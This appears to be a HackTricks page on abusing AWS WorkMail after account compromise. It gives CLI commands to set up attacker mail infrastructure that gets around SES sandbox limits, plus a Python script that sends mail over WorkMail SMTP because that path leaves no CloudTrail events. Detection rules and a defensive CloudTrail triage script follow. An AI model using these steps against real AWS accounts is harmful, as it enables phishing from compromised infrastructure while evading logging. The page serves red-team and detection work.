# AWS - WorkMail Post Exploitation

> [!TIP]
> Learn & practice AWS Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)\
> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)\
> Learn & practice Az Hacking: [**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>
## Abusing WorkMail to bypass SES sandbox

Even when SES is locked in the sandbox (verified recipients only, ~200 msgs/24h, 1 msg/s), WorkMail has no equivalent restriction. An attacker with long-term keys can spin up disposable mail infrastructure and start sending immediately:

- Create a WorkMail org (region-scoped):
```bash
aws workmail create-organization --region us-east-1 --alias temp-mail --directory-id <dir-id-if-reusing>
```
- Verify attacker-controlled domains (WorkMail invokes SES APIs as `workmail.amazonaws.com`):
```bash
aws ses verify-domain-identity --domain attacker-domain.com
aws ses verify-domain-dkim --domain attacker-domain.com
```
- Provision mailbox users and register them:
```bash
aws workmail create-user --organization-id <org-id> --name marketing --display-name "Marketing"
aws workmail register-to-work-mail --organization-id <org-id> --entity-id <user-id> --email marketing@attacker-domain.com
```

Notes:

- Default recipient cap documented by AWS: 100,000 external recipients/day per org (aggregated across users).
- Domain verification activity appears in CloudTrail under SES, but with `invokedBy:workmail.<region>.amazonaws.com`, so SES verification events can belong to WorkMail setup rather than SES campaigns.
- WorkMail mailbox users become application-layer persistence independent from IAM users.
## Sending paths & telemetry gaps

### Web client (WorkMail UI)

- Sends appear as `ses:SendRawEmail` events in CloudTrail with `userIdentity.type=AWSService` and `invokedBy`/`sourceIPAddress`/`userAgent=workmail.<region>.amazonaws.com`, so the real client IP is hidden. `requestParameters` still leak the sender (`source`, `fromArn`, `sourceArn`, configuration set), which can be correlated with newly verified domains/mailboxes.

### SMTP (stealthiest)

- Endpoint: `smtp.mail.<region>.awsapps.com:465` (SMTP over SSL) using the mailbox password.
- No CloudTrail data events are generated for SMTP delivery, even when SES data events are enabled.
- Ideal detection points are org/domain/user provisioning and SES identity ARNs referenced in subsequent web-sent `SendRawEmail` events.
<details>

<summary>Example of sending via WorkMail SMTP</summary>

```python
import smtplib
from email.message import EmailMessage

# WorkMail SMTP endpoint for the org's region; authentication is the mailbox password
SMTP_SERVER = "smtp.mail.us-east-1.awsapps.com"
SMTP_PORT = 465
EMAIL_ADDRESS = "marketing@attacker-domain.com"
EMAIL_PASSWORD = "SuperSecretPassword!"

target = "victim@example.com"  # can be unverified/external
msg = EmailMessage()
msg["Subject"] = "WorkMail SMTP"
msg["From"] = EMAIL_ADDRESS
msg["To"] = target
msg.set_content("Delivered via WorkMail SMTP")

# SMTP over SSL on 465; this path produces no CloudTrail data events
with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as smtp:
    smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)
    smtp.send_message(msg)
```

</details>
## Detection considerations

- If WorkMail is not needed, block it via **SCPs** (`workmail:*` deny) at the organization level.
- Alert on provisioning: `workmail:CreateOrganization`, `workmail:CreateUser`, `workmail:RegisterToWorkMail`, and SES verifications with `invokedBy=workmail.amazonaws.com` (`ses:VerifyDomainIdentity`, `ses:VerifyDomainDkim`).
- Monitor anomalous **`ses:SendRawEmail`** events in which the identity ARNs reference new domains and the source IP/UA is `workmail.<region>.amazonaws.com`.
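The following is an added example, not code from the original page: a small CloudTrail triage routine that implements the detection points listed above and the web-client telemetry described earlier (provisioning calls, SES verifications invoked by WorkMail, and `SendRawEmail` events whose identity ARN points at a domain WorkMail just verified). The records it runs over are constructed sample data with placeholder account ids, IPs and org id; field names follow the CloudTrail record format. The function names `triage`, `via_workmail` and `sender_domain` are this example's own.

```python
"""Added example (not part of the HackTricks page): CloudTrail triage for the
WorkMail provisioning / sending pattern. All records below are constructed."""

PROVISIONING_EVENTS = {"CreateOrganization", "CreateUser", "RegisterToWorkMail"}
VERIFY_EVENTS = {"VerifyDomainIdentity", "VerifyDomainDkim"}

# Constructed sample records; account id, IPs, org id and domains are placeholders.
SAMPLE_EVENTS = [
    {"eventTime": "2024-01-01T10:00:00Z", "eventSource": "workmail.amazonaws.com",
     "eventName": "CreateOrganization", "awsRegion": "us-east-1",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/ci-deploy"},
     "sourceIPAddress": "203.0.113.10",
     "requestParameters": {"alias": "temp-mail"}},
    {"eventTime": "2024-01-01T10:01:00Z", "eventSource": "ses.amazonaws.com",
     "eventName": "VerifyDomainIdentity", "awsRegion": "us-east-1",
     "userIdentity": {"type": "AWSService", "invokedBy": "workmail.us-east-1.amazonaws.com"},
     "sourceIPAddress": "workmail.us-east-1.amazonaws.com",
     "requestParameters": {"domain": "attacker-domain.com"}},
    {"eventTime": "2024-01-01T10:02:00Z", "eventSource": "workmail.amazonaws.com",
     "eventName": "CreateUser", "awsRegion": "us-east-1",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/ci-deploy"},
     "sourceIPAddress": "203.0.113.10",
     "requestParameters": {"organizationId": "m-PLACEHOLDER", "name": "marketing"}},
    {"eventTime": "2024-01-01T10:03:00Z", "eventSource": "workmail.amazonaws.com",
     "eventName": "RegisterToWorkMail", "awsRegion": "us-east-1",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/ci-deploy"},
     "sourceIPAddress": "203.0.113.10",
     "requestParameters": {"organizationId": "m-PLACEHOLDER", "email": "marketing@attacker-domain.com"}},
    {"eventTime": "2024-01-01T10:30:00Z", "eventSource": "ses.amazonaws.com",
     "eventName": "SendRawEmail", "awsRegion": "us-east-1",
     "userIdentity": {"type": "AWSService", "invokedBy": "workmail.us-east-1.amazonaws.com"},
     "sourceIPAddress": "workmail.us-east-1.amazonaws.com",
     "userAgent": "workmail.us-east-1.amazonaws.com",
     "requestParameters": {"source": "marketing@attacker-domain.com",
                           "sourceArn": "arn:aws:ses:us-east-1:111122223333:identity/attacker-domain.com"}},
    # Benign baseline: an application role sending from an established identity.
    {"eventTime": "2024-01-01T10:31:00Z", "eventSource": "ses.amazonaws.com",
     "eventName": "SendRawEmail", "awsRegion": "us-east-1",
     "userIdentity": {"type": "AssumedRole", "arn": "arn:aws:sts::111122223333:assumed-role/app/i-0abc"},
     "sourceIPAddress": "10.0.1.25", "userAgent": "aws-sdk-java/1.12",
     "requestParameters": {"source": "noreply@corp.example",
                           "sourceArn": "arn:aws:ses:us-east-1:111122223333:identity/corp.example"}},
]


def via_workmail(event):
    """True when the call was made by the WorkMail service principal on the
    account's behalf. The page documents invokedBy both as workmail.amazonaws.com
    and workmail.<region>.amazonaws.com, so match the prefix, not a literal."""
    ident = event.get("userIdentity") or {}
    return ident.get("type") == "AWSService" and ident.get("invokedBy", "").startswith("workmail.")


def sender_domain(params):
    """Domain an SES send is attributed to: the identity in sourceArn/fromArn if
    present (it may be a bare domain or a full address), else the domain of `source`."""
    arn = params.get("sourceArn") or params.get("fromArn") or ""
    if ":identity/" in arn:
        identity = arn.rsplit(":identity/", 1)[1]
        return identity.split("@")[-1].lower()
    return params.get("source", "").split("@")[-1].lower()


def triage(events):
    """Return (finding, eventName, detail) tuples in time order.

    SMTP delivery through WorkMail leaves no CloudTrail event at all, so the
    provisioning and domain-verification findings are the primary signal; the
    SendRawEmail correlation only covers mail sent through the web client."""
    findings = []
    workmail_verified = set()  # domains whose SES verification was driven by WorkMail
    for ev in sorted(events, key=lambda e: e.get("eventTime", "")):
        source, name = ev.get("eventSource"), ev.get("eventName")
        params = ev.get("requestParameters") or {}
        if source == "workmail.amazonaws.com" and name in PROVISIONING_EVENTS:
            actor = (ev.get("userIdentity") or {}).get("arn", "unknown")
            findings.append(("workmail_provisioning", name, actor))
        elif source == "ses.amazonaws.com" and name in VERIFY_EVENTS and via_workmail(ev):
            domain = params.get("domain", "").lower()
            workmail_verified.add(domain)
            findings.append(("ses_verify_via_workmail", name, domain))
        elif source == "ses.amazonaws.com" and name == "SendRawEmail" and via_workmail(ev):
            domain = sender_domain(params)
            kind = "workmail_send_new_domain" if domain in workmail_verified else "workmail_send"
            findings.append((kind, name, params.get("source", "")))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(*finding)
```

Events are sorted by `eventTime` before correlation because the "new domain" verdict depends on seeing the WorkMail-driven verification before the send; in a real pipeline the set of WorkMail-verified domains should be persisted across batches, since provisioning and the first sends may land in different log deliveries. The benign SDK send is ignored because its `userIdentity.type` is not `AWSService`, which is the discriminator the web-client section above relies on.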
## References
- [Threat Actors Using AWS WorkMail in Phishing Campaigns](https://www.rapid7.com/blog/post/dr-threat-actors-aws-workmail-phishing-campaigns)
- [AWS WorkMail limits](https://docs.aws.amazon.com/workmail/latest/adminguide/limits.html)